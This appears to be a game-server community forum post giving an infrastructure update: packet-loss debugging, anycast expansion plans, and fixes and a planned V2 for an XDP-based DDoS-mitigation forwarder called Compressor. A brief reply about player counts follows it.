One thing I've also noticed while playing on our CS:S 24/7 Dust2 server which is being ran on the machine with the new hosting provider is I see 1 - 4% packet loss during busy times. This is obviously a concern, but I haven't seen any noticeable performance issues while this occurs. I had other users check as well and they were receiving 1 - 4% packet loss at the time. It appears my route from my city to the game servers is fine. My suspicion is the packets being sent back to the Chicago POP from the game server machine are not making it back in time. There appears to be packet loss at the POP when performing an MTR on the game server machine to the POP server. I've been doing a lot of debugging and the POP's load was only at ~50% when I saw these issues. I also see packet loss when the POP load was only around 30 - 35%. The POP also has two cores and after using the perf top -a --sort cpu command, I can see that one CPU was at 65% CPU and the other was at around 33%. Compressor should be multi-threaded and using all RX queues. The fact that both CPUs had load should prove that statement.
I think this might be with our POP hosting provider's edge. I plan to make a ticket at some point regarding this.
Something else that will probably fix this is issue is running the TC BPF program I made. I noticed similar symptoms on the NYC machines weeks ago and after running the TC BPF program, the symptoms went away (e.g. 0% packet loss at busy times).
I will continue to do investigation on this to see if I can narrow down the issue. Unfortunately, it's quite difficult to debug since XDP isn't great at that. Once the ACL rules are removed, we'll be running the TC BPF program anyways.
Anycast Infrastructure
I asked @Ben to start searching for new hosting providers that support BGP sessions based off of this list. I want to see if we can get 2 - 3 new hosting providers ready for when we expand our Anycast infrastructure (after we make Compressor V2, read below). If we can get the infrastructure expansion plan down now, it'll be a lot less work to do after creating Compressor V2.
One thing I also plan to work on is getting XDP-native support working with our POP servers. This will result in being able to mitigate much larger (D)DoS attacks since we'll be able to drop probably around 8 - 10x more packets per second than XDP-generic. This will be really helpful with Compressor V2 (read below).
Ben plans to do this in the next month. I can also do it if he doesn't get around to doing so, but it'll be a lot of communication work. Though, I had to do this quite a bit before when emailing 30+ hosting providers last time, lol.
Compressor V1 Issues
I am currently making modifications to the current Compressor project created by @Dreae. I created a GitHub fork here that already has two commits. One commit spreads traffic redirected to the AF_XDP socket over all RX queues on the NIC. This resolved an issue back when we tried using Hivelocity as a POP server in NYC (in our case, A2S_INFO caching wasn't working properly). The other commit simply passes non-forwarded ICMP replies to the network stack for debugging a POP server in our case.
The next issue I plan to address is TCP connections not working properly. I'm not sure what exactly is wrong with it and the code appears to be fine. TCP connections over Compressor has been an issue since the start and results in slow speeds, timeouts, and more for TCP. I've done debugging and confirmed requests are being received and sent back by Compressor. Rate limiting and connection limits are also not the issue since I tried increasing these on my local environment and had the same issue.
Once I find a fix for this, I plan to correct my existing pull request that I completely screwed up last night (sorry @Dreae, I'm new to Git pull requests!).
Compressor V2
Compressor V2 is a MAJOR project @Dreae and I will be working on. It will be a huge improvement compared to Compressor V1 and I want this created before expanding our Anycast infrastructure. We are still designing the layout of it all (well, mostly Dreae is since he's far ahead of me in regards to programming/networking). I am currently learning Elixir which will be used for the backbone and more so I can help contribute to the project. With that said, I plan to help with the design as well if needed.
Compressor V2 will have the following advantages over Compressor V1:
- All POPs will be controlled by a backbone. This makes it easy to add POP servers, game servers, and so on. This will also make it so we don't have to restart Compressor each time we need to update the config.
- Will be capable of filtering large (D)DoS attacks based off of addable filtering rules on the backbone.
- Malicious traffic will be dropped via XDP (see a comparison here).
- Forwarding and so on will occur within the user space allowing us to debug traffic via tcpdump and catch attacks (currently not available on Compressor V1 since XDP forwards packets before the network stack).
- TCP connections will work without any issues.
- Will be performing plain NAT to each POP server and vice versa. This will be more reliable than the current method and better performing in most cases as well. This will remove the need of the TC BPF program I made and give us more control over routing.
The project will be using a mixture of C, XDP/TC/BPF, IPTables, Elixir, Rust or GoLang, and more!
This is definitely something I'm very excited about as well. This is the type of project a team of high-paid engineers would be assigned to do. Therefore, the fact that we're making this without being paid is pretty neat
Once I have more details on this project and an official game plan, I will let you all know!
Conclusion
That's basically it. As you can see, I am keeping myself busy! I am pretty excited to start troubleshooting some of these issues and work on the new projects such as Compressor V2.
If you have any questions, please let me know!
Thank you for your time.




We've Hit 1000+ Active Players On All Game Servers At The Same Time!
in General Discussion
Posted
I'm not sure about overall population, but we were hitting 900 - 950 peak players around January (before COVID-19 blew up). Though, we've definitely seen a spike in population, especially with CS:S. Here is CS:S's SteamDB graph:
Sadly seems to be going back down now